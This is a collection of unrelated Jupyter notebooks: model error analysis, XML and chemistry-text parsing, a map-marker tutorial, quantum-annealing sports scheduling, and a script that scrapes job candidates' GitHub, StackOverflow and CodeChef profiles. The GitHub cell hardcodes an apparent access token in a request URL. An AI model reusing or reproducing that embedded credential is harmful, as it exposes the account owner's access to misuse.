errors_group_one={}, errors_group_two={}, y_axis_label="Occurence", sort_on_key=True):
"""Save a two-series grouped bar chart of *values* (label -> {group_key: count}).

Bars for group_one_key and group_two_key are drawn side by side per label;
optional per-label error dicts add error bars. NOTE(review): the default
y_axis_label "Occurence" is misspelled ("Occurrence") — kept as-is since
it is a runtime default visible in saved figures.
"""
sorted_values = list(values.items())
if sort_on_key:
sorted_values.sort()
values_group_one = [value[1][group_one_key] for value in sorted_values]
values_group_two = [value[1][group_two_key] for value in sorted_values]
# Error dicts are keyed by label; both must be provided together.
if len(errors_group_one) > 0:
sorted_errors_group_one = [errors_group_one[value[0]] for value in sorted_values]
sorted_errors_group_two = [errors_group_two[value[0]] for value in sorted_values]
else:
sorted_errors_group_one = None
sorted_errors_group_two = None
labels = [value[0] for value in sorted_values]
assert len(labels) == len(values_group_one)
assert len(labels) == len(values_group_two)
y_pos = np.arange(len(labels))
fig, ax = plt.subplots()
# Offset the second series by one bar width to place the groups side by side.
width = 0.35
p1 = ax.bar(y_pos, values_group_one, width, yerr=sorted_errors_group_one, align='center', alpha=0.5)
p2 = ax.bar(y_pos + width, values_group_two, width, yerr=sorted_errors_group_two, align='center', alpha=0.5)
plt.gcf().subplots_adjust(bottom=0.2, )
plt.xticks(y_pos, labels, rotation=90, fontsize="xx-small")
plt.ylabel(y_axis_label)
plt.title(title)
ax.legend((p1[0], p2[0]), (group_one_key, group_two_key))
plt.savefig(save_path)
plt.close()
# Change to your directories here!
# Which trained model / split to analyse; paths are derived from these.
pattern = "e"
seed = 88
split = "test"
predictions_file = f"../../../testing_logs/{pattern}-random-seed-{seed}/{split}_{pattern}-random-seed-{seed}.json"
output_file = f"../../../testing_logs/{pattern}-random-seed-{seed}/{split}_{pattern}-random-seed-{seed}-analysis.txt"
save_directory = f"../../../testing_logs/{pattern}-random-seed-{seed}/"
# test out the vocabulary
# Word lists defining the command grammar used by the dataset.
intransitive_verbs = ["walk"]
transitive_verbs = ["push", "pull"]
adverbs = ["while zigzagging", "while spinning", "cautiously", "hesitantly"]
nouns = ["circle", "cylinder", "square", "box"]
color_adjectives = ["red", "blue", "green", "yellow"]
size_adjectives = ["big", "small"]
relative_pronouns = ["that is"]
relation_clauses = ["in the same row as",
"in the same column as",
"in the same color as",
"in the same shape as",
"in the same size as",
"inside of"]
vocabulary = Vocabulary.initialize(intransitive_verbs=intransitive_verbs,
transitive_verbs=transitive_verbs, adverbs=adverbs, nouns=nouns,
color_adjectives=color_adjectives,
size_adjectives=size_adjectives,
relative_pronouns=relative_pronouns,
relation_clauses=relation_clauses)
# test out the object vocab
min_object_size = 1
max_object_size = 4
object_vocabulary = ObjectVocabulary(shapes=vocabulary.get_semantic_shapes(),
colors=vocabulary.get_semantic_colors(),
min_size=min_object_size, max_size=max_object_size)
# object_vocabulary.generate_objects()
assert os.path.exists(predictions_file), "Trying to open a non-existing predictions file."
# Per-dimension buckets of accuracy / exact-match scores, filled below.
error_analysis = {
"target_length": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"input_length": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"verb_in_command": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"manner": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"distance_to_target": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"direction_to_target": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
"actual_target": defaultdict(lambda: {"accuracy": [], "exact_match": []}),
}
all_accuracies = []
exact_matches = []
with open(predictions_file, 'r') as infile:
data = json.load(infile)
logger.info("Running error analysis on {} examples.".format(len(data)))
for predicted_example in data:
# Get the scores of the current example.
accuracy = predicted_example["accuracy"]
exact_match = predicted_example["exact_match"]
all_accuracies.append(accuracy)
exact_matches.append(exact_match)
# Get the information about the current example.
example_information = {
"input_length": len(predicted_example["input"]),
"verb_in_command": vocabulary.translate_word(predicted_example["input"][0])}
adverb = ""
if predicted_example['input'][-1] in vocabulary.get_adverbs():
adverb = predicted_example['input'][-1]
# NOTE(review): indentation was lost in this dump — if this assignment sits
# inside the if-branch, examples without an adverb reuse the previous
# iteration's `manner`; confirm against the original notebook.
manner = vocabulary.translate_word(adverb)
example_information["target_length"] = len(predicted_example["target"])
situation_repr = predicted_example["situation"]
situation = Situation.from_representation(situation_repr[0])
example_information["actual_target"] = ' '.join([str(situation.target_object.object.size),
situation.target_object.object.color,
situation.target_object.object.shape])
example_information["direction_to_target"] = situation.direction_to_target
example_information["distance_to_target"] = situation.distance_to_target
example_information["manner"] = manner
# Add that information to the analysis.
for key in error_analysis.keys():
error_analysis[key][example_information[key]]["accuracy"].append(accuracy)
error_analysis[key][example_information[key]]["exact_match"].append(exact_match)
# Write the information to a file and make plots
# One Excel sheet + one text section + three plots per analysis dimension.
workbook = Workbook()
with open(output_file, 'w') as outfile:
outfile.write("Error Analysis\n\n")
outfile.write(" Mean accuracy: {}\n".format(np.mean(np.array(all_accuracies))))
exact_matches_counter = Counter(exact_matches)
outfile.write(" Num. exact matches: {}\n".format(exact_matches_counter[True]))
outfile.write(" Num not exact matches: {}\n\n".format(exact_matches_counter[False]))
for key, values in error_analysis.items():
# Sheet header: one row per bucket value with count / accuracy / exact-match stats.
sheet = workbook.add_sheet(key)
sheet.write(0, 0, key)
sheet.write(0, 1, "Num examples")
sheet.write(0, 2, "Mean accuracy")
sheet.write(0, 3, "Std. accuracy")
sheet.write(0, 4, "Exact Match")
sheet.write(0, 5, "Not Exact Match")
sheet.write(0, 6, "Exact Match Percentage")
outfile.write("\nDimension {}\n\n".format(key))
means = {}
standard_deviations = {}
num_examples = {}
exact_match_distributions = {}
exact_match_relative_distributions = {}
for i, (item_key, item_values) in enumerate(values.items()):
outfile.write(" {}:{}\n\n".format(key, item_key))
accuracies = np.array(item_values["accuracy"])
mean_accuracy = np.mean(accuracies)
means[item_key] = mean_accuracy
num_examples[item_key] = len(item_values["accuracy"])
standard_deviation = np.std(accuracies)
standard_deviations[item_key] = standard_deviation
exact_match_distribution = Counter(item_values["exact_match"])
exact_match_distributions[item_key] = exact_match_distribution
# Fraction of exact matches within this bucket.
exact_match_relative_distributions[item_key] = exact_match_distribution[True] / (
exact_match_distribution[False] + exact_match_distribution[True])
outfile.write(" Num. examples: {}\n".format(len(item_values["accuracy"])))
outfile.write(" Mean accuracy: {}\n".format(mean_accuracy))
outfile.write(" Min. accuracy: {}\n".format(np.min(accuracies)))
outfile.write(" Max. accuracy: {}\n".format(np.max(accuracies)))
outfile.write(" Std. accuracy: {}\n".format(standard_deviation))
outfile.write(" Num. exact match: {}\n".format(exact_match_distribution[True]))
outfile.write(" Num. not exact match: {}\n\n".format(exact_match_distribution[False]))
sheet.write(i + 1, 0, item_key)
sheet.write(i + 1, 1, len(item_values["accuracy"]))
sheet.write(i + 1, 2, mean_accuracy)
sheet.write(i + 1, 3, standard_deviation)
sheet.write(i + 1, 4, exact_match_distribution[True])
sheet.write(i + 1, 5, exact_match_distribution[False])
sheet.write(i + 1, 6, exact_match_distribution[True] / (
exact_match_distribution[False] + exact_match_distribution[True]))
outfile.write("\n\n\n")
bar_plot(means, title=key, save_path=os.path.join(save_directory, key + '_accuracy'),
errors=standard_deviations, y_axis_label="accuracy")
bar_plot(exact_match_relative_distributions, title=key, save_path=os.path.join(
save_directory, key + '_exact_match_rel'),
errors={}, y_axis_label="Exact Match Percentage")
grouped_bar_plot(values=exact_match_distributions, group_one_key=True, group_two_key=False,
title=key + ' Exact Matches', save_path=os.path.join(save_directory,
key + '_exact_match'),
sort_on_key=True)
outfile_excel = output_file.split(".txt")[0] + ".xls"
workbook.save(outfile_excel)
# Overall exact-match ratio (displayed as the notebook cell's output).
exact_matches_counter[True] / (exact_matches_counter[True] + exact_matches_counter[False])
```
| github_jupyter |
```
import xml.etree.ElementTree as ET  # cElementTree is deprecated; ElementTree is C-accelerated
import pandas as pd

filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
# Bug fix: ET.ElementTree(filepath) treats the path string as a root element;
# ET.parse() actually reads and parses the file.
tree = ET.parse(filepath)
root = tree.getroot()
# Removed: `root = ET.fromstring(country_data_as_string)` referenced an
# undefined name (NameError) and immediately clobbered the parsed root.
# Extract the local name between ':' and the closing '>' of a qualified tag.
teststring = '<coooo:yessir>'
start = teststring.index(':')
end = len(teststring)
# Slice past the colon and drop the trailing '>'.
substring = teststring[start + 1:end - 1]
print(substring)
import xml.etree.ElementTree as ET
import pandas as pd

filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
# iterparse streams (event, element) pairs without loading the whole tree first.
tree = ET.iterparse(filepath)
tag = '{http://www.elsevier.com/xml/svapi/article/dtd}table'
for event, node in tree:
    # Bug fix: the original used `node.tag in tag`, a substring test that also
    # matches partial tag names; exact equality is what is intended here.
    if node.tag == tag:
        print(node.tag, node.text)
#print(list(root.iter()))
import xml.etree.ElementTree as ET

namespaces = {'ce': 'http://www.elsevier.com/xml/common/dtd'}
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"

def header(filepath, target_tabl_id):
    """Return the caption texts of the <ce:table> whose id is *target_tabl_id*.

    Bug fix: the original did `lst = lst.append(name)`, which rebinds lst to
    None (list.append returns None), so the function always returned None.
    """
    lst = []
    tree = ET.parse(filepath)  # read in the XML
    for tags in tree.iter('{http://www.elsevier.com/xml/common/dtd}floats'):
        tabl_id = tags.find('ce:table', namespaces).attrib['id']
        if tabl_id == target_tabl_id:  # choose the table to pull from
            for var in tags.iter('{http://www.elsevier.com/xml/common/dtd}caption'):
                name = var.find('ce:simple-para', namespaces).text
                lst.append(name)
    return lst
# Look up captions for table "tbl1" and display the result.
output = header(filepath, "tbl1")
print(output)
# Context manager ensures the handle is closed even if read() raises;
# the original opened the file and never closed it.
with open("C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml",
          "r", encoding="utf8") as file:
    contents = file.read()
import xml.etree.ElementTree as ET

namespaces = {'ce': 'http://www.elsevier.com/xml/common/dtd'}
filepath = "C:/Users/shulo/DataExtractor/DataExtractor/notebook/Demos/testing_download_articles/write_test_els_paper6.xml"

def header(filepath, target_tabl_id):
    """Return the caption texts of the <ce:table> whose id is *target_tabl_id*.

    Bug fix: the original did `return lst.append(name)` — list.append returns
    None, so the function always returned None and stopped at the first caption.
    """
    lst = []
    tree = ET.parse(filepath)  # read in the XML
    for tags in tree.iter('{http://www.elsevier.com/xml/common/dtd}floats'):
        tabl_id = tags.find('ce:table', namespaces).attrib['id']
        if tabl_id == target_tabl_id:  # choose the table to pull from
            for var in tags.iter('{http://www.elsevier.com/xml/common/dtd}caption'):
                name = var.find('ce:simple-para', namespaces).text
                lst.append(name)
    return lst
# Display the result of the caption lookup for table "tbl1".
output = header(filepath, "tbl1")
print(output)
# Code below extracts title from table
import xml.etree.ElementTree as ET

namespaces = {'ce': 'http://www.elsevier.com/xml/common/dtd'}
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"

def header(filepath, target_tabl_id):
    """Collect the caption text of every table whose caption id matches."""
    captions = []
    tree = ET.parse(filepath)  # read in the XML
    table_tag = '{http://www.elsevier.com/xml/common/dtd}table'
    caption_tag = '{http://www.elsevier.com/xml/common/dtd}caption'
    for table in tree.iter(table_tag):
        # Only tables whose caption carries the requested id contribute.
        if table.find('ce:caption', namespaces).attrib['id'] != target_tabl_id:
            continue
        for caption in table.iter(caption_tag):
            captions.append(caption.find('ce:simple-para', namespaces).text)
    return captions
output = header(filepath, "cap0070")
print(output)
import xml.etree.ElementTree as ET

# Scratch script: print the header-row entries of every table in the file.
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
tree = ET.parse(filepath)
root = ET.tostring(tree.getroot())  # serialized root; assigned but unused below
lst = tree.iter('{http://www.elsevier.com/xml/common/cals/dtd}thead')
for tags in lst:
    # First <row> of each table header (cals namespace).
    row = tags.find('{http://www.elsevier.com/xml/common/cals/dtd}row')
    # NOTE(review): <entry> is looked up in the common/dtd namespace while
    # <thead>/<row> use the cals namespace — confirm against the source XML;
    # if entries are also in the cals namespace this findall yields nothing.
    entry_list = row.findall('{http://www.elsevier.com/xml/common/dtd}entry')
    for x in entry_list:
        print(x.text)
# Code extracts all elements within the tbody tag, which corresponds to the numerical values in the table
import xml.etree.ElementTree as ET

# Scratch script: print the body-row entries (numeric cells) of every table.
filepath = "C:/Users/walid/Desktop/Walid's XML table extraction scratch/testing_download_articles/write_test_els_paper6.xml"
tree = ET.parse(filepath)
root = ET.tostring(tree.getroot())  # serialized root; assigned but unused below
lst = tree.iter('{http://www.elsevier.com/xml/common/cals/dtd}tbody')
for tags in lst:
    # Only the first <row> of each body is read here (cals namespace).
    row = tags.find('{http://www.elsevier.com/xml/common/cals/dtd}row')
    # NOTE(review): <entry> is looked up in the common/dtd namespace while
    # <tbody>/<row> use the cals namespace — confirm against the source XML.
    entry_list = row.findall('{http://www.elsevier.com/xml/common/dtd}entry')
    for x in entry_list:
        print(x.text)
# Testing ChemDataExtractor Input 1
import logging
import re
import pandas as pd
import urllib
import time
# import feedparser
import chemdataextractor as cde
from chemdataextractor import Document
import chemdataextractor.model as model
from chemdataextractor.model import Compound, UvvisSpectrum, UvvisPeak, BaseModel, StringType, ListType, ModelType
from chemdataextractor.parse.common import hyphen
from chemdataextractor.parse.base import BaseParser
from chemdataextractor.utils import first
from chemdataextractor.parse.actions import strip_stop
from chemdataextractor.parse.elements import W, I, T, R, Optional, ZeroOrMore, OneOrMore
from chemdataextractor.parse.cem import chemical_name
from chemdataextractor.doc import Paragraph, Sentence
# Input 1
import chemdataextractor
import chemdataextractor.model as model
from chemdataextractor.model import Compound
from chemdataextractor.doc import Document, Heading, Paragraph, Sentence
# Create a Simple example document with a single heading followed by a single paragraph
d = Document(
Heading(u'Synthesis of 2,4,6-trinitrotoluene (3a)'),
Paragraph(u'The procedure was followed to yield a pale yellow solid (b.p. 240 °C)')
)
# display a heading and a paragraph of the given content
d
# Next define the schema of a new property, and add it to the Compound model
from chemdataextractor.model import BaseModel, StringType, ListType, ModelType
class BoilingPoint(BaseModel):
    """ChemDataExtractor property model: one boiling point reading."""
    value = StringType()  # numeric text as extracted, e.g. "240"
    units = StringType()  # unit text as extracted, e.g. "°C"
Compound.boiling_points = ListType(ModelType(BoilingPoint))
# define new parsing rules that define how to interpret and convert it into the model
import re
from chemdataextractor.parse import R, I, W, Optional, merge
prefix = (R(u'^b\.?p\.?$', re.I) | I(u'boiling') + I(u'point')).hide()
units = (W(u'°') + Optional(R(u'^[CFK]\.?$')))(u'units').add_action(merge)
value = R(u'^\d+(\.\d+)?$')(u'value')
bp = (prefix + value + units)(u'bp')
from chemdataextractor.parse.base import BaseParser
from chemdataextractor.utils import first
class BpParser(BaseParser):
    """Turn `bp` grammar matches into Compound records with boiling points."""
    root = bp  # parse rule defined above: prefix + value + units

    def interpret(self, result, start, end):
        """Yield a Compound carrying the matched boiling point.

        `result` is the parse-tree element produced by the `bp` rule; the
        value/units text nodes are read via xpath from the named children.
        """
        compound = Compound(
            boiling_points=[
                BoilingPoint(
                    value=first(result.xpath('./value/text()')),
                    units=first(result.xpath('./units/text()'))
                )
            ]
        )
        yield compound
Paragraph.parsers = [BpParser()]
d = Document(
Heading(u'Synthesis of 2,4,6-trinitrotoluene (3a)'),
Paragraph(u'The procedure was followed to yield a pale yellow solid (b.p. 240 °C)')
)
d.records.serialize()
# Next trying to organize everything to be presentable
# psuedo code
#for each property in the table {
#prop_list = prop_list.add(property)
#}
#for each material {
#add the name of the material to a list of material names
#}
#for each material in the above list {
#create an empty list to store the properties for this material specifically
#for each property for that material {
#add the value to the recently created list
#}
#}
# Bug fix: the original read `prop_list = proplist.add(x.text)` — `proplist`
# was never defined (NameError), lists have no `.add` method, and rebinding
# to the return value would have discarded the list anyway.  Accumulate the
# table-cell texts into a list instead.
prop_list = []
for x in entry_list:
    prop_list.append(x.text)
import re
from chemdataextractor.parse import R, I, W, Optional, merge

# Bug fix: the original prefix used a JavaScript-style regex literal
# (/mp+|MP+[mp] m\.p|M.P+|(melting point)|\d/gim), which is a SyntaxError in
# Python.  Rebuilt as a parse rule mirroring the boiling-point rule earlier
# in the notebook: match "mp" / "m.p." in any capitalisation, or the words
# "melting point" (I() matches case-insensitively).
prefix = (R(r'^[mM]\.?[pP]\.?$', re.I) | I(u'melting') + I(u'point')).hide()
units = (W(u'°') + Optional(R(u'^[CFK]\.?$')))(u'units').add_action(merge)
value = R(u'^\d+(\.\d+)?$')(u'value')
bp = (prefix + value + units)(u'bp')
"""So this is Walid's first go at using Regex,
to be quite honest it seemed like a big challange he would never overcome,
but with the motivation from his good pals Shu and Adam he has been grinding it out.
So without further ado, let's talk about melting point.
Now why Melting point? Well you see lad, M.P can be repped different ways.
MP is when the material starts melting duh.
Notice how I hit you with both Melting Point and melting point see the captilization?
what about m.P or M.p? so if I say M.p = 0K or MP is 10000 F (woah those are crazy numbers).
what if i have some typos like mmp or MMpp"""
```
| github_jupyter |
```
{%custom-css%}
```
{%header%}
A Marker identifies a location on a map. By default, a marker uses a standard image.
Markers can display custom images using the icon parameter.
<h1 class="title1">Table of Contents</h1>
* [Create a map with a marker](#marker1)
* [Marker animation](#marker2)
* [Custom icons](#marker3)
* [Custom colors](#marker4)
* [Custom icon from URL](#marker5)
* [Creating a MarkerCluster](#marker6)
```
import os
import random
from IPython.display import HTML, display
import pandas as pd
```
<a id="marker1"></a>
<h1 class="title1">Create a Map with a Marker</h1>
```
API_KEY = os.environ['MAPS_API_KEY']
from pymaps import Map
from pymaps.marker import Marker, MarkerCluster
fernando_de_noronha = (-3.8576, -32.4297)
m = Map(api_key=API_KEY, zoom=13)
title = 'Fernando de Noronha' # hover the mouse over the marker to show the title
Marker(fernando_de_noronha, title=title).add_to(m)
m
```
* Lets add more markers...
```
cities = {"rome": (41.9028, 12.4964),
'paris' : (48.8566, 2.3522),
'madrid' : (40.4168, -3.7038),
'berlin' : (52.5200, 13.4050),
'amsterdan' : (52.3702, 4.8952),
'london' : (51.509865, -0.118092)}
map = Map([-18.99, -44.04], api_key=API_KEY, zoom=6, show_pegman=False, disable_default_ui=True)
for n, values in enumerate(cities.items(), 1):
city_name, latlgn = values
title = city_name.title()
Marker(latlgn, title=title, label=n).add_to(map)
map.fit_bounds(cities.values())
map
```
<a id="marker2"></a>
## Marker animation
```
for marker in map.children['marker']:
if marker.title == 'London':
marker.set_animation('BOUNCE')
marker.label = ''
map
```
<a id="marker3"></a>
## Built-in custom icons
```
from pymaps.icon import *
from pymaps.utils import random_latlng
```
There are **8 customs** icons and **19 color sets** that you can use to customize your markers
### Custom Icons
```
m = Map(api_key=API_KEY)
lat = 0
lng = -80
for n, shape in enumerate(SHAPES):
color = list(COLORS.keys())[n]
icon = Icon(shape, color=color, size=2)
Marker([lat, lng], icon=icon, title=shape).add_to(m)
lng += 20
m
```
<a id="marker4"></a>
## Built-in custom colors
```
m = Map(api_key=API_KEY, style='grayscale')
lat = -30
lng = 0
for n, color in enumerate(COLORS.keys()):
if n > 0 and n % 5 == 0:
lat += 20
lng -= 100
icon = Icon('dot', color=color, size=2)
Marker([lat, lng], icon=icon, title=color).add_to(m)
lng += 20
m
```
### Customize everything !
```
m = Map(api_key=API_KEY, zoom=1, style='silver')
for shape in SHAPES:
size = random.randint(1, 3)
color=random.choice([c for c in COLORS])
icon = Icon(shape, color=color, size=size)
coordinates = random_latlng()
Marker(coordinates, icon=icon, title=shape + ' - ' + color).add_to(m)
m
```
<a id="marker5"></a>
## Custom icon from URL
* Markers's icons also can be customized from any image URL
```
gb_icon = 'https://www.workaway.info/gfx/flags/flag_great_britain.png'
for marker in map.children['marker']:
if marker.title == 'London':
marker.icon = gb_icon
marker.set_animation('BOUNCE')
marker.label = ''
else:
marker.set_animation('DROP')
map.set_style('water')
map
```
<a id="marker6"></a>
# MarkerCluster
```
cities['buenos_aires'] = (-34.6037, -58.3816)
cities['brasilia'] = (-15.7942, -47.8822)
cities['santiago'] = (-33.4489, -70.6693)
map = Map(api_key=API_KEY, show_pegman=False, disable_default_ui=True)
cluster = MarkerCluster()
for n, values in enumerate(cities.items(), 1):
city_name, latlgn = values
title = city_name.title()
Marker(latlgn, title=title, label=n).add_to(cluster)
cluster.add_to(map)
map
```
| github_jupyter |
Make the Binary Quadratic Model for sports scheduling problem.
Definitions and comments in this code are based on the following paper.
Title:
**SOLVING LARGE BREAK MINIMIZATION PROBLEMS IN A MIRRORED DOUBLE ROUND-ROBIN TOURNAMENT USING QUANTUM ANNEALING.**
(https://arxiv.org/pdf/2110.07239.pdf)
Author:
- Michiya Kuramata (Tokyo Institute of Technology, Tokyo, Japan)
- Ryota Katsuki (NTT DATA, Tokyo, Japan)
- Nakata Kazuhide (Tokyo Institute of Technology, Tokyo, Japan)
```
import itertools
import pyqubo
from dwave.system.samplers import DWaveSampler
from dwave.system import EmbeddingComposite
import neal
import gurobipy
from sports.sports_scheduling import *
from sports.sports_gurobi import *
```
# MDRRT using D-Wave Machine (or SA).
#### Set the Parameters for MDRRT
```
# 2n is the number of teams.
# n should be 2 <= n <= 24.
# If n=2, the num of teams is 4 and timeslots in RRT and MDRRT are 3 and 6 respectively (same shape with Table 1).
# If n=4, the num of teams is 8 and timeslots in RRT and MDRRT are 7 and 14.
n = 4
# version is the problem instance used in this experiments.
# Each version is correspond to the csv files in problems directory.
# These files are used in Numerical experiments and Discussion section in our paper.
# Csv files are calculated by Kirkman Schedule and shuffled in advance independently.
# If you need to remake them, run sports_scheduling.kirkman_schedule and shuffle them on your own.
# If you set n=2 and choose version=0, you are going to use problems/02_v0_schedule.csv
version = 0
mdrrt = MDRRT(n, f'./problems/{n:02}_v{version}_schedule.csv')
```
`mdrrt.schedule` is based on MDRRT (**Mirrored** Double Round Robin Tournament), so the table in timeslot 0\~6 and 7\~13 is same.
- num of teams: 8
- num of timeslots in MDRRT: 14
```
mdrrt.schedule
# Definition of decision variable z
z_q = pyqubo.Array.create('z', shape=n*(2*n-1), vartype='BINARY')
# Definition of decision variable y
y_q = z_to_y(mdrrt, z_q)
# Make the objective function (6) using pyqubo
# Note that you don't need to include constraints here according to (7) and (8).
objective_function = make_objective_function(mdrrt, y_q)
model = objective_function.compile()
# Make the Binary Quadratic Model for D-Wave.
bqm = model.to_bqm()
bqm.normalize()
```
#### Input bqm into D-Wave or Simulated Annealing.
```
# Set the endpoint, token and solver for the experiments.
# You need to register D-Wave Leap account.
# (If you use Simulated Annealing instead, please ignore this block.)
endpoint = 'https://cloud.dwavesys.com/sapi' # change according to your account.
token = '***' # change according to your account.
solver = 'Advantage_system1.1' # change according to your account.
child_sampler = DWaveSampler(
endpoint=endpoint,
token=token,
solver=solver
)
sampler = EmbeddingComposite(child_sampler)
# If you use Simulated Annealing instead, run the following block.
# (If you use D-Wave Machine, please ignore this block.)
sampler = neal.SimulatedAnnealingSampler()
# If you use D-Wave Machine, set the appropriate parameters here
num_reads = 1000
annealing_time = 50
sampleset = sampler.sample(
bqm,
annealing_time = annealing_time, #If you use SA, comment out this line.
num_reads = num_reads
)
sampleset = sampleset.aggregate()
# Pick up top 3 solutions.
data_list = [data for i, data in enumerate(sampleset.data(sorted_by='energy')) if i <3]
break_term_c = objective_function.compile()
samples = break_term_c.decode_sampleset(sampleset)
sample = min(samples, key=lambda s: s.energy)
num_breaks_qa = int(sample.energy)
```
#### Result
```
print("num of breaks (D-Wave or SA):", num_breaks_qa)
```
# MDRRT experiments by Integer Programming (Urdaneta)
```
model, y = urdaneta_BMP(
mdrrt,
timeout=300,
model_name='Urdaneta_BMP'
)
num_breaks_urdaneta = round(model.objval)
calculation_time = model.Runtime
print("num of broken (Urdaneta):", num_breaks_urdaneta)
print(f'time (Urdaneta): {round(calculation_time, 7)} seconds')
```
# MDRRT experiments by Integer Programming (Trick)
```
model, athome = trick_BMP(
mdrrt,
timeout=300,
model_name='Trick_BMP'
)
calculation_time = model.Runtime
gb_answer = np.zeros((mdrrt.num_teams, mdrrt.num_slots), int)
for i in range(mdrrt.num_teams):
for t in range(mdrrt.num_slots):
try:
temp = athome[i][t].getValue() if isinstance(athome[i][t], gurobipy.LinExpr) else athome[i][t].X
gb_answer[i][t] = round(temp, 2)
except AttributeError:
break
num_breaks_trick = 0
for i in range(mdrrt.num_teams):
prev = None
for t in gb_answer[i]:
if prev == t:
num_breaks_trick += 1
prev = t
print(f'breaks (Trick): {num_breaks_trick}')
print(f'time (Trick): {round(calculation_time, 7)} seconds')
```
# Compare methods
The calculation time for Gurobi to reach the objective function value which the D-Wave Advantage reaches in 0.05 s.
```
#Terminate if IP(urdaneta) find the better solution than QA.
#solve the problem using gurobi(IP(urdaneta))
model,y = urdaneta_BMP(
mdrrt,
timeout=None,
model_name='Urdaneta_BMP',
best_obj_stop=num_breaks_qa
)
urdaneta_time = model.Runtime
print(f"time: {round(urdaneta_time,7)} seconds")
```
| github_jupyter |
# Scorey
- Scraping, aggregating and assessing technical ability of a candidate based on publicly available sources
## Problem Statement
The current interview scenario is biased towards "candidate's performance during the 2 hour interview" and doesn't take other factors into account such as candidate's competitive coding abilities, contribution towards developer community and so on.
## Approach
Scorey tries to solve this problem by aggregating publicly available data from various websites such as
* Github
* StackOverflow
* CodeChef
* Codebuddy
* Codeforces
* Hackerearth
* SPOJ
* GitAwards
Once the data is collected, the algorithm then defines a comprehensive scoring system that grades the candidate's technical capabilities based on the following factors
- Ranking
- Number of Problems Solved
- Activity
- Reputation
- Contribution
- Followers
The candidate is then assigned a score out of 100 <br>
This helps the interviewer get a full view of the candidate's abilities and therefore helps them make an unbiased, informed decision.
-------
## ( Initial Setup )
```
def color_negative_red(val):
    """
    Takes a scalar and returns a string with
    the css property `'color: red'` for negative
    values, black otherwise.
    """
    # Bug fix: the original tested `val > 0`, which colored *positive* values
    # red — contradicting both the function name and the docstring.
    color = 'red' if val < 0 else 'black'
    return 'color: %s' % color
# Set CSS properties for th elements in dataframe
th_props = [
('font-size', '15px'),
('text-align', 'center'),
('font-weight', 'bold'),
('color', '#00c936'),
('background-color', '##f7f7f7')
]
# Set CSS properties for td elements in dataframe
td_props = [
('font-size', '15px'),
('font-weight', 'bold')
]
# Set table styles
styles = [
dict(selector="th", props=th_props),
dict(selector="td", props=td_props)
]
```
-------
## Candidate's Username
- This information can be extracted in two ways <br>
- Parsing the resume
- Adding additional fields in the job application form
- Scrape it from personal website
```
import urllib.request
import requests
#return requests.get(url).json()
import json
import csv
serviceurl = 'https://api.github.com/users/'
#user = 'poke19962008'
user = input('Enter candidates username - ')
```
## Extracting all possible links/ usernames from personal website
```
from bs4 import BeautifulSoup
import urllib
import urllib.parse
import urllib.request
from urllib.request import urlopen
url = input('Enter your personal website - ')
html = urlopen(url).read()
soup = BeautifulSoup(html, "lxml")
tags = soup('a')
for tag in tags:
print (tag.get('href',None))
```
## 1. Github
```
# Fetch the candidate's GitHub profile JSON from the REST API.
user = 'poke19962008'
#user = raw_input('Enter user_name : ')
#if len(user) < 1 : break
# NOTE(review): `+=` mutates the module-level serviceurl, so re-running this
# cell appends the username again and corrupts the URL.
serviceurl += user +'?'
# SECURITY: a personal access token is hardcoded in source.  It should be
# revoked and loaded from an environment variable / secrets store instead.
# Passing the token as an `access_token` query parameter also exposes it in
# logs and proxies — presumably a bearer Authorization header is expected;
# verify against the GitHub API documentation.
access_token = "0b330104cd6dc94a8c29afb28a77ee8398e1c77b"
url = serviceurl + urllib.parse.urlencode({'access_token': access_token})
print('Retrieving', url)
uh = urllib.request.urlopen(url)
data = uh.read()
#print data
#js = json.loads(str(data))
js = json.loads(data.decode("utf-8"))
js
import pandas as pd
df = pd.DataFrame.from_dict(js, orient='columns')
df = df.iloc[3:]
df
df_new = df.filter(['email','public_repos','followers','hireable','company','updated_at'], axis=1)
(df_new.style
.set_table_styles(styles))
#json.dumps(js, indent=4)
# df['public_repos'] = js['public_repos']
# #df['total_private_repos'] = js['total_private_repos']
# df['followers'] = js['followers']
# df['hireable'] = js['hireable']
# df['company'] = js['company']
# df['updated_at'] = js['updated_at']
print("Number of public repositores - ", js['public_repos'])
#print("Number of private repositores - ", js['total_private_repos'])
print("Number of followers - ", js['followers'])
print("Is candidate looking for job? - ", js['hireable'])
print("Company - ", js['company'])
print("Last seen - ", js['updated_at'])
```
--------
## 2. StackOverflow
```
import stackexchange
so = stackexchange.Site(stackexchange.StackOverflow)
u = so.user('1600172')
print('reputation is' , u.reputation.format())
print('no of questions answered - ', u.answers.count)
df_new['stack_reputation'] = u.reputation.format()
df_new['stack_answer_count'] = u.answers.count
df_new.set_index('email')
(df_new.style
.set_table_styles(styles))
```
--------
## 3. CodeChef
```
import requests
from bs4 import BeautifulSoup

# Scrape the candidate's CodeChef profile for rating and rankings.
# Bug fix: the original host was "https://wwww.codechef.com" (four w's), so
# every request failed to resolve.
head = "https://www.codechef.com/users/"
var = user
URL = head + user
page = requests.get(URL)
soup = BeautifulSoup(page.content, 'html.parser')
# These three lines give the Rating of the user.
listRating = list(soup.findAll('div', class_="rating-number"))
rating = list(listRating[0].children)
rating = rating[0]
print("Rating: " + rating)
df_new['CodeChef_rating'] = rating
listGCR = []  # Global and country ranking.
listRanking = list(soup.findAll('div', class_="rating-ranks"))
rankingSoup = listRanking[0]
for item in rankingSoup.findAll('a'):
    listGCR.append(item.get_text())  # Extracting the text from all anchor tags
print("Global Ranking: " + listGCR[0])
df_new['CodeChef_global_rank'] = listGCR[0]
print("Country Ranking: " + listGCR[1])
df_new['CodeChef_Country_rank'] = listGCR[1]
